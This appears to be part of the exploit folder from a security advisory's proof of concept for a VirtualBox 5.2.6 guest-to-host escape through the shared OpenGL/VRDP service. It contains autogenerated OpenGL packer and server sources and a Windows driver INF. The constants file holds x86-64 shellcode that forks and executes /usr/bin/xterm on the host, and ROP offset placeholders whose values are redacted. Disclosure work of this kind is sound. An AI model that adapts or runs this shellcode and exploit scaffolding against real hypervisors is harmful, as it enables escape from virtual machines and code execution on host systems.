26 | len_aligned = ( len + 0x3 ) & ~0x3;
27 | total_len = 24 + len_aligned;
28 |
29 | WRITE_DATA(0, int, SWAP32(total_len));
30 | WRITE_DATA(4, int, SWAP32(bounds->x1));
31 | WRITE_DATA(8, int, SWAP32(bounds->y1));
32 | WRITE_DATA(12, int, SWAP32(bounds->x2));
33 | WRITE_DATA(16, int, SWAP32(bounds->y2));
34 | WRITE_DATA(20, int, SWAP32(num_opcodes));
35 |
36 | /* skip the BOUNDSINFO */
37 | data_ptr += 24;
38 |
39 | /* put in padding opcodes (deliberately bogus) */
40 | switch ( len_aligned - len )
41 | {
42 | case 3: *data_ptr++ = 0xff; RT_FALL_THRU();
43 | case 2: *data_ptr++ = 0xff; RT_FALL_THRU();
44 | case 1: *data_ptr++ = 0xff; RT_FALL_THRU();
45 | default: break;
46 | }
47 |
48 | crMemcpy( data_ptr, payload, len );
49 |
50 | WRITE_OPCODE( pc, CR_BOUNDSINFOCR_OPCODE );
51 | pc->buffer.data_current += 24 + len_aligned;
52 | CR_UNLOCK_PACKER_CONTEXT(pc);
53 | }
54 |
--------------------------------------------------------------------------------
/SSD Advisory - 3736/exploit/poc_vrdpexploit/vrdpexploit/VBoxOGLgen/pack_clipplane_swap.c:
--------------------------------------------------------------------------------
1 | /* THIS FILE IS AUTOGENERATED FROM E:/home/src/VirtualBox/src/VBox/GuestHost/OpenGL/packer/pack_clipplane.c BY pack_swap.py */
2 |
3 |
4 | /* Copyright (c) 2001, Stanford University
5 | * All rights reserved
6 | *
7 | * See the file LICENSE.txt for information on redistributing this software.
8 | */
9 |
10 | #include "packer.h"
11 | #include "cr_opcodes.h"
12 |
13 | void PACK_APIENTRY crPackClipPlaneSWAP( GLenum plane, const GLdouble *equation )
14 | {
15 | CR_GET_PACKER_CONTEXT(pc);
16 | unsigned char *data_ptr;
17 | int packet_length = sizeof( plane ) + 4*sizeof(*equation);
18 | CR_GET_BUFFERED_POINTER(pc, packet_length );
19 | WRITE_DATA(0, GLenum, SWAP32(plane));
20 | WRITE_SWAPPED_DOUBLE( 4, equation[0] );
21 | WRITE_SWAPPED_DOUBLE( 12, equation[1] );
22 | WRITE_SWAPPED_DOUBLE( 20, equation[2] );
23 | WRITE_SWAPPED_DOUBLE( 28, equation[3] );
24 | WRITE_OPCODE( pc, CR_CLIPPLANE_OPCODE );
25 | CR_UNLOCK_PACKER_CONTEXT(pc);
26 | }
27 |
--------------------------------------------------------------------------------
/SSD Advisory - 3736/exploit/poc_vrdpexploit/vrdpexploit/VBoxOGLgen/pack_fog_swap.c:
--------------------------------------------------------------------------------
1 | /* THIS FILE IS AUTOGENERATED FROM E:/home/src/VirtualBox/src/VBox/GuestHost/OpenGL/packer/pack_fog.c BY pack_swap.py */
2 |
3 |
4 | /* Copyright (c) 2001, Stanford University
5 | * All rights reserved
6 | *
7 | * See the file LICENSE.txt for information on redistributing this software.
8 | */
9 |
10 | #include "packer.h"
11 | #include "cr_opcodes.h"
12 |
13 | static GLboolean __handleFogData( GLenum pname, const GLfloat *params )
14 | {
15 | CR_GET_PACKER_CONTEXT(pc);
16 | int params_length = 0;
17 | int packet_length = sizeof( int ) + sizeof( pname );
18 | unsigned char *data_ptr;
19 | switch( pname )
20 | {
21 | case GL_FOG_MODE:
22 | case GL_FOG_DENSITY:
23 | case GL_FOG_START:
24 | case GL_FOG_END:
25 | case GL_FOG_INDEX:
26 | params_length = sizeof( *params );
27 | break;
28 | case GL_FOG_COLOR:
29 | params_length = 4*sizeof( *params );
30 | break;
31 | default:
32 | params_length = __packFogParamsLength( pname );
33 | if (!params_length)
34 | {
35 | char msg[100];
36 | sprintf(msg, "Invalid pname in Fog: %d", (int) pname );
37 | __PackError( __LINE__, __FILE__, GL_INVALID_ENUM, msg);
38 | return GL_FALSE;
39 | }
40 | break;
41 | }
42 | packet_length += params_length;
43 |
44 | CR_GET_BUFFERED_POINTER(pc, packet_length );
45 | WRITE_DATA(0, int, SWAP32(packet_length));
46 | WRITE_DATA(4, GLenum, SWAP32(pname));
47 | WRITE_DATA(8, GLuint, SWAPFLOAT(params[0]));
48 | if (packet_length > 12)
49 | {
50 | WRITE_DATA(12, GLuint, SWAPFLOAT(params[1]));
51 | WRITE_DATA(16, GLuint, SWAPFLOAT(params[2]));
52 | WRITE_DATA(20, GLuint, SWAPFLOAT(params[3]));
53 | }
54 | return GL_TRUE;
55 | }
56 |
57 | void PACK_APIENTRY crPackFogfvSWAP(GLenum pname, const GLfloat *params)
58 | {
59 | CR_GET_PACKER_CONTEXT(pc);
60 | if (__handleFogData( pname, params ))
61 | WRITE_OPCODE( pc, CR_FOGFV_OPCODE );
62 | CR_UNLOCK_PACKER_CONTEXT(pc);
63 | }
64 |
65 | void PACK_APIENTRY crPackFogivSWAP(GLenum pname, const GLint *params)
66 | {
67 | CR_GET_PACKER_CONTEXT(pc);
68 | /* floats and ints are the same size, so the packing should be the same */
69 | if (__handleFogData( pname, (const GLfloat *) params ))
70 | WRITE_OPCODE( pc, CR_FOGIV_OPCODE );
71 | CR_UNLOCK_PACKER_CONTEXT(pc);
72 | }
73 |
--------------------------------------------------------------------------------
/SSD Advisory - 3736/exploit/poc_vrdpexploit/vrdpexploit/VBoxOGLgen/pack_materials_swap.c:
--------------------------------------------------------------------------------
1 | /* THIS FILE IS AUTOGENERATED FROM E:/home/src/VirtualBox/src/VBox/GuestHost/OpenGL/packer/pack_materials.c BY pack_swap.py */
2 |
3 |
4 | /* Copyright (c) 2001, Stanford University
5 | * All rights reserved
6 | *
7 | * See the file LICENSE.txt for information on redistributing this software.
8 | */
9 |
10 | #include "packer.h"
11 | #include "cr_error.h"
12 |
13 | static void __handleMaterialData( GLenum face, GLenum pname, const GLfloat *params )
14 | {
15 | CR_GET_PACKER_CONTEXT(pc);
16 | unsigned int packet_length = sizeof( int ) + sizeof( face ) + sizeof( pname );
17 | unsigned int params_length = 0;
18 | unsigned char *data_ptr;
19 | switch( pname )
20 | {
21 | case GL_AMBIENT:
22 | case GL_DIFFUSE:
23 | case GL_SPECULAR:
24 | case GL_EMISSION:
25 | case GL_AMBIENT_AND_DIFFUSE:
26 | params_length = 4*sizeof( *params );
27 | break;
28 | case GL_COLOR_INDEXES:
29 | params_length = 3*sizeof( *params );
30 | break;
31 | case GL_SHININESS:
32 | params_length = sizeof( *params );
33 | break;
34 | default:
35 | __PackError(__LINE__, __FILE__, GL_INVALID_ENUM, "glMaterial(pname)");
36 | return;
37 | }
38 | packet_length += params_length;
39 |
40 | CR_GET_BUFFERED_POINTER(pc, packet_length );
41 | WRITE_DATA(0, int, SWAP32(packet_length));
42 | WRITE_DATA(sizeof( int ) + 0, GLenum, SWAP32(face));
43 | WRITE_DATA(sizeof( int ) + 4, GLenum, SWAP32(pname));
44 | WRITE_DATA(sizeof( int ) + 8, GLuint, SWAPFLOAT(params[0]));
45 | if (params_length > sizeof( *params ))
46 | {
47 | WRITE_DATA(sizeof( int ) + 12, GLuint, SWAPFLOAT(params[1]));
48 | WRITE_DATA(sizeof( int ) + 16, GLuint, SWAPFLOAT(params[2]));
49 | }
50 | if (packet_length > 3*sizeof( *params ) )
51 | {
52 | WRITE_DATA(sizeof( int ) + 20, GLuint, SWAPFLOAT(params[3]));
53 | }
54 | }
55 |
56 | void PACK_APIENTRY crPackMaterialfvSWAP(GLenum face, GLenum pname, const GLfloat *params)
57 | {
58 | CR_GET_PACKER_CONTEXT(pc);
59 | __handleMaterialData( face, pname, params );
60 | WRITE_OPCODE( pc, CR_MATERIALFV_OPCODE );
61 | CR_UNLOCK_PACKER_CONTEXT(pc);
62 | }
63 |
64 | void PACK_APIENTRY crPackMaterialivSWAP(GLenum face, GLenum pname, const GLint *params)
65 | {
66 | /* floats and ints are the same size, so the packing should be the same */
67 | CR_GET_PACKER_CONTEXT(pc);
68 | __handleMaterialData( face, pname, (const GLfloat *) params );
69 | WRITE_OPCODE( pc, CR_MATERIALIV_OPCODE );
70 | CR_UNLOCK_PACKER_CONTEXT(pc);
71 | }
72 |
--------------------------------------------------------------------------------
/SSD Advisory - 3736/exploit/poc_vrdpexploit/vrdpexploit/VBoxOGLgen/pack_regcombiner_swap.c:
--------------------------------------------------------------------------------
1 | /* THIS FILE IS AUTOGENERATED FROM E:/home/src/VirtualBox/src/VBox/GuestHost/OpenGL/packer/pack_regcombiner.c BY pack_swap.py */
2 |
3 |
4 | /* Copyright (c) 2001, Stanford University
5 | * All rights reserved
6 | *
7 | * See the file LICENSE.txt for information on redistributing this software.
8 | */
9 |
10 | #include "packer.h"
11 | #include "cr_opcodes.h"
12 |
13 | static GLboolean __handleCombinerParameterData(GLenum pname, const GLfloat *params, GLenum extended_opcode)
14 | {
15 | CR_GET_PACKER_CONTEXT(pc);
16 | unsigned int params_length = 0;
17 | unsigned int packet_length = sizeof(int) + sizeof(extended_opcode) + sizeof(pname);
18 | unsigned char *data_ptr;
19 |
20 | switch(pname)
21 | {
22 | case GL_CONSTANT_COLOR0_NV:
23 | case GL_CONSTANT_COLOR1_NV:
24 | params_length = 4 * sizeof(*params);
25 | break;
26 | case GL_NUM_GENERAL_COMBINERS_NV:
27 | case GL_COLOR_SUM_CLAMP_NV:
28 | params_length = sizeof(*params);
29 | break;
30 | default:
31 | __PackError(__LINE__, __FILE__, GL_INVALID_ENUM,
32 | "crPackCombinerParameterSWAP(bad pname)");
33 | CRASSERT(0);
34 | return GL_FALSE;
35 | }
36 | packet_length += params_length;
37 | CR_GET_BUFFERED_POINTER(pc, packet_length);
38 | WRITE_DATA(0, int, SWAP32(packet_length));
39 | WRITE_DATA(sizeof(int) + 0, GLenum, SWAP32(extended_opcode));
40 | WRITE_DATA(sizeof(int) + 4, GLenum, SWAP32(pname));
41 | WRITE_DATA(sizeof(int) + 8, GLuint, SWAPFLOAT(params[0]));
42 | if (params_length > sizeof(*params))
43 | {
44 | WRITE_DATA(sizeof(int) + 12, GLuint, SWAPFLOAT(params[1]));
45 | WRITE_DATA(sizeof(int) + 16, GLuint, SWAPFLOAT(params[2]));
46 | WRITE_DATA(sizeof(int) + 20, GLuint, SWAPFLOAT(params[3]));
47 | CRASSERT(packet_length == sizeof(int) + 20 + 4);
48 | }
49 | return GL_TRUE;
50 | }
51 |
52 | void PACK_APIENTRY crPackCombinerParameterfvNVSWAP(GLenum pname, const GLfloat *params)
53 | {
54 | CR_GET_PACKER_CONTEXT(pc);
55 | if (__handleCombinerParameterData(pname, params, CR_COMBINERPARAMETERFVNV_EXTEND_OPCODE))
56 | WRITE_OPCODE(pc, CR_EXTEND_OPCODE);
57 | CR_UNLOCK_PACKER_CONTEXT(pc);
58 | }
59 |
60 | void PACK_APIENTRY crPackCombinerParameterivNVSWAP(GLenum pname, const GLint *params)
61 | {
62 | /* floats and ints are the same size, so the packing should be the same */
63 | CR_GET_PACKER_CONTEXT(pc);
64 | if (__handleCombinerParameterData(pname, (const GLfloat *) params, CR_COMBINERPARAMETERIVNV_EXTEND_OPCODE))
65 | WRITE_OPCODE(pc, CR_EXTEND_OPCODE);
66 | CR_UNLOCK_PACKER_CONTEXT(pc);
67 | }
68 |
69 | void PACK_APIENTRY crPackCombinerStageParameterfvNVSWAP(GLenum stage, GLenum pname, const GLfloat *params)
70 | {
71 | CR_GET_PACKER_CONTEXT(pc);
72 | unsigned char *data_ptr;
73 |
74 | CR_GET_BUFFERED_POINTER(pc, 32);
75 | WRITE_DATA(0, GLint, SWAP32(32));
76 | WRITE_DATA(4, GLenum, SWAP32(CR_COMBINERSTAGEPARAMETERFVNV_EXTEND_OPCODE));
77 | WRITE_DATA(8, GLenum, SWAP32(stage));
78 | WRITE_DATA(12, GLenum, SWAP32(pname));
79 | WRITE_DATA(16, GLuint, SWAPFLOAT(params[0]));
80 | WRITE_DATA(20, GLuint, SWAPFLOAT(params[1]));
81 | WRITE_DATA(24, GLuint, SWAPFLOAT(params[2]));
82 | WRITE_DATA(28, GLuint, SWAPFLOAT(params[3]));
83 | WRITE_OPCODE(pc, CR_EXTEND_OPCODE);
84 | CR_UNLOCK_PACKER_CONTEXT(pc);
85 | }
86 |
--------------------------------------------------------------------------------
/SSD Advisory - 3736/exploit/poc_vrdpexploit/vrdpexploit/VBoxOGLgen/pack_stipple_swap.c:
--------------------------------------------------------------------------------
1 | /* THIS FILE IS AUTOGENERATED FROM E:/home/src/VirtualBox/src/VBox/GuestHost/OpenGL/packer/pack_stipple.c BY pack_swap.py */
2 |
3 |
4 | /* Copyright (c) 2001, Stanford University
5 | * All rights reserved
6 | *
7 | * See the file LICENSE.txt for information on redistributing this software.
8 | */
9 |
10 | #include "packer.h"
11 | #include "cr_opcodes.h"
12 | #include "cr_mem.h"
13 | #include "cr_glstate.h"
14 |
15 | void PACK_APIENTRY crPackPolygonStippleSWAP( const GLubyte *mask )
16 | {
17 | CR_GET_PACKER_CONTEXT(pc);
18 | unsigned char *data_ptr;
19 | int nodata = crStateIsBufferBound(GL_PIXEL_UNPACK_BUFFER_ARB);
20 | int packet_length = sizeof(int);
21 |
22 | if (nodata)
23 | packet_length += sizeof(GLint);
24 | else
25 | packet_length += 32*32/8;
26 |
27 | CR_GET_BUFFERED_POINTER(pc, packet_length );
28 | WRITE_DATA_AI(int, SWAP32(nodata));
29 | if (nodata)
30 | {
31 | WRITE_DATA_AI(GLint, SWAP32((GLint)(uintptr_t)mask));
32 | }
33 | else
34 | {
35 | crMemcpy( data_ptr, mask, 32*32/8 );
36 | }
37 | WRITE_OPCODE( pc, CR_POLYGONSTIPPLE_OPCODE );
38 | CR_UNLOCK_PACKER_CONTEXT(pc);
39 | }
40 |
--------------------------------------------------------------------------------
/SSD Advisory - 3736/exploit/poc_vrdpexploit/vrdpexploit/VBoxOGLgen/packspu_flush.c:
--------------------------------------------------------------------------------
1 | /* Copyright (c) 2001, Stanford University
2 | All rights reserved.
3 |
4 | See the file LICENSE.txt for information on redistributing this software. */
5 |
6 |
7 | /* DO NOT EDIT - this file generated by packspu_flush.py script */
8 |
9 | /* These are otherwise ordinary functions which require that the buffer be
10 | * flushed immediately after packing the function.
11 | */
12 | #include "cr_glstate.h"
13 | #include "cr_packfunctions.h"
14 | #include "packspu.h"
15 | #include "packspu_proto.h"
16 |
17 | void PACKSPU_APIENTRY packspu_BarrierCreateCR(GLuint name, GLuint count)
18 | {
19 | GET_THREAD(thread);
20 | if (pack_spu.swap)
21 | {
22 | crPackBarrierCreateCRSWAP(name, count);
23 | }
24 | else
25 | {
26 | crPackBarrierCreateCR(name, count);
27 | }
28 | packspuFlush( (void *) thread );
29 | }
30 |
31 | void PACKSPU_APIENTRY packspu_BarrierExecCR(GLuint name)
32 | {
33 | GET_THREAD(thread);
34 | if (pack_spu.swap)
35 | {
36 | crPackBarrierExecCRSWAP(name);
37 | }
38 | else
39 | {
40 | crPackBarrierExecCR(name);
41 | }
42 | packspuFlush( (void *) thread );
43 | }
44 |
45 | void PACKSPU_APIENTRY packspu_SemaphoreCreateCR(GLuint name, GLuint count)
46 | {
47 | GET_THREAD(thread);
48 | if (pack_spu.swap)
49 | {
50 | crPackSemaphoreCreateCRSWAP(name, count);
51 | }
52 | else
53 | {
54 | crPackSemaphoreCreateCR(name, count);
55 | }
56 | packspuFlush( (void *) thread );
57 | }
58 |
59 | void PACKSPU_APIENTRY packspu_SemaphorePCR(GLuint name)
60 | {
61 | GET_THREAD(thread);
62 | if (pack_spu.swap)
63 | {
64 | crPackSemaphorePCRSWAP(name);
65 | }
66 | else
67 | {
68 | crPackSemaphorePCR(name);
69 | }
70 | packspuFlush( (void *) thread );
71 | }
72 |
73 | void PACKSPU_APIENTRY packspu_SemaphoreVCR(GLuint name)
74 | {
75 | GET_THREAD(thread);
76 | if (pack_spu.swap)
77 | {
78 | crPackSemaphoreVCRSWAP(name);
79 | }
80 | else
81 | {
82 | crPackSemaphoreVCR(name);
83 | }
84 | packspuFlush( (void *) thread );
85 | }
86 |
87 |
--------------------------------------------------------------------------------
/SSD Advisory - 3736/exploit/poc_vrdpexploit/vrdpexploit/VBoxOGLgen/server_retval.c:
--------------------------------------------------------------------------------
1 | /* Copyright (c) 2001, Stanford University
2 | All rights reserved.
3 |
4 | See the file LICENSE.txt for information on redistributing this software. */
5 |
6 |
7 | /* DO NOT EDIT - THIS FILE AUTOMATICALLY GENERATED BY server_retval.py SCRIPT */
8 | #include "chromium.h"
9 | #include "cr_mem.h"
10 | #include "cr_net.h"
11 | #include "server_dispatch.h"
12 | #include "server.h"
13 |
14 | void crServerReturnValue( const void *payload, unsigned int payload_len )
15 | {
16 | if (!cr_server.fProcessingPendedCommands)
17 | {
18 | CRMessageReadback *rb;
19 | int msg_len = sizeof( *rb ) + payload_len;
20 |
21 | /* Don't reply to client if we're loading VM snapshot*/
22 | if (cr_server.bIsInLoadingState)
23 | return;
24 |
25 | if (cr_server.curClient->conn->type == CR_FILE)
26 | {
27 | return;
28 | }
29 |
30 | rb = (CRMessageReadback *) crAlloc( msg_len );
31 |
32 | rb->header.type = CR_MESSAGE_READBACK;
33 | CRDBGPTR_PRINTRB(cr_server.curClient->conn->u32ClientID, &cr_server.writeback_ptr);
34 | CRDBGPTR_CHECKNZ(&cr_server.writeback_ptr);
35 | CRDBGPTR_CHECKNZ(&cr_server.return_ptr);
36 | crMemcpy( &(rb->writeback_ptr), &(cr_server.writeback_ptr), sizeof( rb->writeback_ptr ) );
37 | crMemcpy( &(rb->readback_ptr), &(cr_server.return_ptr), sizeof( rb->readback_ptr ) );
38 | crMemcpy( rb+1, payload, payload_len );
39 | crNetSend( cr_server.curClient->conn, NULL, rb, msg_len );
40 | CRDBGPTR_SETZ(&cr_server.writeback_ptr);
41 | CRDBGPTR_SETZ(&cr_server.return_ptr);
42 | crFree( rb );
43 | return;
44 | }
45 | #ifdef DEBUG_misha
46 | WARN(("Pending command returns value"));
47 | #endif
48 | CRDBGPTR_SETZ(&cr_server.writeback_ptr);
49 | CRDBGPTR_SETZ(&cr_server.return_ptr);
50 | }
51 |
52 | GLenum SERVER_DISPATCH_APIENTRY crServerDispatchCheckFramebufferStatusEXT(GLenum target)
53 | {
54 | GLenum retval;
55 | retval = cr_server.head_spu->dispatch_table.CheckFramebufferStatusEXT(target);
56 | crServerReturnValue( &retval, sizeof(retval) );
57 | return retval; /* WILL PROBABLY BE IGNORED */
58 | }
59 | GLboolean SERVER_DISPATCH_APIENTRY crServerDispatchIsEnabled(GLenum cap)
60 | {
61 | GLboolean retval;
62 | retval = cr_server.head_spu->dispatch_table.IsEnabled(cap);
63 | crServerReturnValue( &retval, sizeof(retval) );
64 | return retval; /* WILL PROBABLY BE IGNORED */
65 | }
66 | GLboolean SERVER_DISPATCH_APIENTRY crServerDispatchIsFenceNV(GLuint fence)
67 | {
68 | GLboolean retval;
69 | retval = cr_server.head_spu->dispatch_table.IsFenceNV(fence);
70 | crServerReturnValue( &retval, sizeof(retval) );
71 | return retval; /* WILL PROBABLY BE IGNORED */
72 | }
73 | GLboolean SERVER_DISPATCH_APIENTRY crServerDispatchIsQueryARB(GLuint id)
74 | {
75 | GLboolean retval;
76 | retval = cr_server.head_spu->dispatch_table.IsQueryARB(id);
77 | crServerReturnValue( &retval, sizeof(retval) );
78 | return retval; /* WILL PROBABLY BE IGNORED */
79 | }
80 | GLint SERVER_DISPATCH_APIENTRY crServerDispatchRenderMode(GLenum mode)
81 | {
82 | GLint retval;
83 | retval = cr_server.head_spu->dispatch_table.RenderMode(mode);
84 | crServerReturnValue( &retval, sizeof(retval) );
85 | return retval; /* WILL PROBABLY BE IGNORED */
86 | }
87 | GLboolean SERVER_DISPATCH_APIENTRY crServerDispatchTestFenceNV(GLuint fence)
88 | {
89 | GLboolean retval;
90 | retval = cr_server.head_spu->dispatch_table.TestFenceNV(fence);
91 | crServerReturnValue( &retval, sizeof(retval) );
92 | return retval; /* WILL PROBABLY BE IGNORED */
93 | }
94 |
--------------------------------------------------------------------------------
/SSD Advisory - 3736/exploit/poc_vrdpexploit/vrdpexploit/VBoxOGLgen/state_line_gen.c:
--------------------------------------------------------------------------------
1 | /* This code is AUTOGENERATED!!! */
2 |
3 | #include "state.h"
4 | #include "state_internals.h"
5 |
6 | void crStateLineDiff(CRLineBits *b, CRbitvalue *bitID,
7 | CRContext *fromCtx, CRContext *toCtx)
8 | {
9 | CRLineState *from = &(fromCtx->line);
10 | CRLineState *to = &(toCtx->line);
11 | unsigned int j, i;
12 | CRbitvalue nbitID[CR_MAX_BITARRAY];
13 | for (j = 0; jenable, bitID))
17 | {
18 | glAble able[2];
19 | able[0] = diff_api.Disable;
20 | able[1] = diff_api.Enable;
21 | if (from->lineSmooth != to->lineSmooth)
22 | {
23 | able[to->lineSmooth](GL_LINE_SMOOTH);
24 | from->lineSmooth = to->lineSmooth;
25 | }
26 | if (from->lineStipple != to->lineStipple)
27 | {
28 | able[to->lineStipple](GL_LINE_STIPPLE);
29 | from->lineStipple = to->lineStipple;
30 | }
31 | CLEARDIRTY(b->enable, nbitID);
32 | }
33 | if (CHECKDIRTY(b->width, bitID))
34 | {
35 | if (from->width != to->width)
36 | {
37 | diff_api.LineWidth(to->width);
38 | from->width = to->width;
39 | }
40 | CLEARDIRTY(b->width, nbitID);
41 | }
42 | if (to->lineStipple)
43 | {
44 | if (CHECKDIRTY(b->stipple, bitID))
45 | {
46 | if (from->repeat != to->repeat ||
47 | from->pattern != to->pattern)
48 | {
49 | diff_api.LineStipple(to->repeat,
50 | to->pattern);
51 | from->repeat = to->repeat;
52 | from->pattern = to->pattern;
53 | }
54 | CLEARDIRTY(b->stipple, nbitID);
55 | }
56 | } /*lineStipple*/
57 | CLEARDIRTY(b->dirty, nbitID);
58 | }
59 |
60 | void crStateLineSwitch(CRLineBits *b, CRbitvalue *bitID,
61 | CRContext *fromCtx, CRContext *toCtx)
62 | {
63 | CRLineState *from = &(fromCtx->line);
64 | CRLineState *to = &(toCtx->line);
65 | unsigned int j, i;
66 | CRbitvalue nbitID[CR_MAX_BITARRAY];
67 | for (j = 0; jenable, bitID))
71 | {
72 | glAble able[2];
73 | able[0] = diff_api.Disable;
74 | able[1] = diff_api.Enable;
75 | if (from->lineSmooth != to->lineSmooth)
76 | {
77 | able[to->lineSmooth](GL_LINE_SMOOTH);
78 | FILLDIRTY(b->enable);
79 | FILLDIRTY(b->dirty);
80 | }
81 | if (from->lineStipple != to->lineStipple)
82 | {
83 | able[to->lineStipple](GL_LINE_STIPPLE);
84 | FILLDIRTY(b->enable);
85 | FILLDIRTY(b->dirty);
86 | }
87 | CLEARDIRTY(b->enable, nbitID);
88 | }
89 | if (CHECKDIRTY(b->width, bitID))
90 | {
91 | if (from->width != to->width)
92 | {
93 | diff_api.LineWidth(to->width);
94 | FILLDIRTY(b->width);
95 | FILLDIRTY(b->dirty);
96 | }
97 | CLEARDIRTY(b->width, nbitID);
98 | }
99 | if (CHECKDIRTY(b->stipple, bitID))
100 | {
101 | if (from->repeat != to->repeat ||
102 | from->pattern != to->pattern)
103 | {
104 | diff_api.LineStipple(to->repeat,
105 | to->pattern);
106 | FILLDIRTY(b->stipple);
107 | FILLDIRTY(b->dirty);
108 | }
109 | CLEARDIRTY(b->stipple, nbitID);
110 | }
111 | CLEARDIRTY(b->dirty, nbitID);
112 | }
113 |
114 |
--------------------------------------------------------------------------------
/SSD Advisory - 3736/exploit/poc_vrdpexploit/vrdpexploit/_Constants.cpp:
--------------------------------------------------------------------------------
1 | #include
2 |
3 | /******************************************************************************
4 | * Exploit's contants - if something not works, consider to review them
5 | ******************************************************************************/
6 |
7 | /* Removed for the sake of PoC */
8 | ULONGLONG OffsetFromOglToLeakedAddr = ???; // VBoxSharedCrOpenGL.so
9 | ULONGLONG OffsetFromVboxddToLeakedAddr = ???; // VBoxDD.so
10 | ULONGLONG OffsetFromOglToVramPtr = ???; // g_pvVRamBase
11 | ULONGLONG OffsetFromVboxddToRopGadget = ???;
12 |
13 | UCHAR gShellcode[] =
14 | "\x48\xC7\xC0\x3A\x00\x00\x00" // mov rax, 00000003A
15 | "\x0F\x05" // syscall
16 | "\x48\x85\xC0" // test rax, rax
17 | "\x75\x3A" // jnz 000000048
18 | "\x48\x8D\x35\x4E\x00\x00\x00" // lea rsi, [000000063]
19 | "\x48\x89\x35\x6B\x00\x00\x00" // mov [000000087], rsi
20 | "\x48\x8D\x35\x57\x00\x00\x00" // lea rsi, [00000007A]
21 | "\x48\x89\x35\x6D\x00\x00\x00" // mov [000000097], rsi
22 | "\x48\x8D\x3D\x32\x00\x00\x00" // lea rdi, [000000063]
23 | "\x48\x8D\x35\x4F\x00\x00\x00" // lea rsi, [000000087]
24 | "\x48\x8D\x15\x58\x00\x00\x00" // lea rdx, [000000097]
25 | "\x48\xC7\xC0\x3B\x00\x00\x00" // mov rax, 00000003B
26 | "\x0F\x05" // syscall
27 | "\x48\x8B\xBC\x24\xB8\x01\x00\x00" // mov rdi, [rsp][0000002D8]
28 | "\x48\x81\xC5\x80\x03\x00\x00" // add rbp, 0000002D0
29 | "\x48\x81\xC4\xC0\x01\x00\x00" // add rsp, 0000002E0
30 | "\x48\x31\xC0" // xor rax, rax
31 | "\x57" // push rdi
32 | "\xC3" // retn
33 | "\x2F\x75\x73\x72\x2F\x62\x69\x6E\x2F\x78\x74\x65\x72\x6D\x00\x00\x00\x00\x00\x00\x00\x00\x00" // "/usr/bin/xterm"
34 | "\x44\x49\x53\x50\x4C\x41\x59\x3D\x3A\x30\x2E\x30\x00" // "DISPLAY=:0.0"
35 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" // argv[]
36 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"; // envp[]
37 |
38 | SIZE_T gShellcodeSize = sizeof(gShellcode);
39 |
40 | /******************************************************************************
41 | * End of exploit's contants
42 | ******************************************************************************/
43 |
--------------------------------------------------------------------------------
/SSD Advisory - 3736/exploit/poc_vrdpexploit/vrdpexploit/product-generated.h:
--------------------------------------------------------------------------------
1 | #ifndef ___product_generated_h___
2 | #define ___product_generated_h___
3 |
4 | #define VBOX_VENDOR "Oracle Corporation"
5 | #define VBOX_VENDOR_SHORT "Oracle"
6 | #define VBOX_PRODUCT "Oracle VM VirtualBox"
7 | #define VBOX_BUILD_PUBLISHER "_OSE"
8 | #define VBOX_C_YEAR "2018"
9 |
10 | #endif
11 |
--------------------------------------------------------------------------------
/SSD Advisory - 3736/exploit/poc_vrdpexploit/vrdpexploit/version-generated.h:
--------------------------------------------------------------------------------
1 | #ifndef ___version_generated_h___
2 | #define ___version_generated_h___
3 |
4 | #define VBOX_VERSION_MAJOR 5
5 | #define VBOX_VERSION_MINOR 2
6 | #define VBOX_VERSION_BUILD 6
7 | #define VBOX_VERSION_STRING_RAW "5.2.6"
8 | #define VBOX_VERSION_STRING "5.2.6_OSE"
9 | #define VBOX_API_VERSION_STRING "5_2"
10 |
11 | #define VBOX_PRIVATE_BUILD_DESC "Private build by admin"
12 |
13 | #endif
14 |
--------------------------------------------------------------------------------
/SSD Advisory - 3736/exploit/poc_vrdpexploit/vrdpexploit/vrdpexploit.inf:
--------------------------------------------------------------------------------
1 | ;
2 | ; vrdpexploit.inf
3 | ;
4 |
5 | [Version]
6 | Signature="$WINDOWS NT$"
7 | Class=Sample ; TODO: edit Class
8 | ClassGuid={78A1C341-4539-11d3-B88D-00C04FAD5171} ; TODO: edit ClassGuid
9 | Provider=%ManufacturerName%
10 | CatalogFile=vrdpexploit.cat
11 | DriverVer= ; TODO: set DriverVer in stampinf property pages
12 |
13 | [DestinationDirs]
14 | DefaultDestDir = 12
15 | vrdpexploit_Device_CoInstaller_CopyFiles = 11
16 |
17 | ; ================= Class section =====================
18 |
19 | [ClassInstall32]
20 | Addreg=SampleClassReg
21 |
22 | [SampleClassReg]
23 | HKR,,,0,%ClassName%
24 | HKR,,Icon,,-5
25 |
26 | [SourceDisksNames]
27 | 1 = %DiskName%,,,""
28 |
29 | [SourceDisksFiles]
30 | vrdpexploit.sys = 1,,
31 | WdfCoInstaller$KMDFCOINSTALLERVERSION$.dll=1 ; make sure the number matches with SourceDisksNames
32 |
33 | ;*****************************************
34 | ; Install Section
35 | ;*****************************************
36 |
37 | [Manufacturer]
38 | %ManufacturerName%=Standard,NT$ARCH$
39 |
40 | [Standard.NT$ARCH$]
41 | %vrdpexploit.DeviceDesc%=vrdpexploit_Device, Root\vrdpexploit ; TODO: edit hw-id
42 |
43 | [vrdpexploit_Device.NT]
44 | CopyFiles=Drivers_Dir
45 |
46 | [Drivers_Dir]
47 | vrdpexploit.sys
48 |
49 | ;-------------- Service installation
50 | [vrdpexploit_Device.NT.Services]
51 | AddService = vrdpexploit,%SPSVCINST_ASSOCSERVICE%, vrdpexploit_Service_Inst
52 |
53 | ; -------------- vrdpexploit driver install sections
54 | [vrdpexploit_Service_Inst]
55 | DisplayName = %vrdpexploit.SVCDESC%
56 | ServiceType = 1 ; SERVICE_KERNEL_DRIVER
57 | StartType = 3 ; SERVICE_DEMAND_START
58 | ErrorControl = 1 ; SERVICE_ERROR_NORMAL
59 | ServiceBinary = %12%\vrdpexploit.sys
60 |
61 | ;
62 | ;--- vrdpexploit_Device Coinstaller installation ------
63 | ;
64 |
65 | [vrdpexploit_Device.NT.CoInstallers]
66 | AddReg=vrdpexploit_Device_CoInstaller_AddReg
67 | CopyFiles=vrdpexploit_Device_CoInstaller_CopyFiles
68 |
69 | [vrdpexploit_Device_CoInstaller_AddReg]
70 | HKR,,CoInstallers32,0x00010000, "WdfCoInstaller$KMDFCOINSTALLERVERSION$.dll,WdfCoInstaller"
71 |
72 | [vrdpexploit_Device_CoInstaller_CopyFiles]
73 | WdfCoInstaller$KMDFCOINSTALLERVERSION$.dll
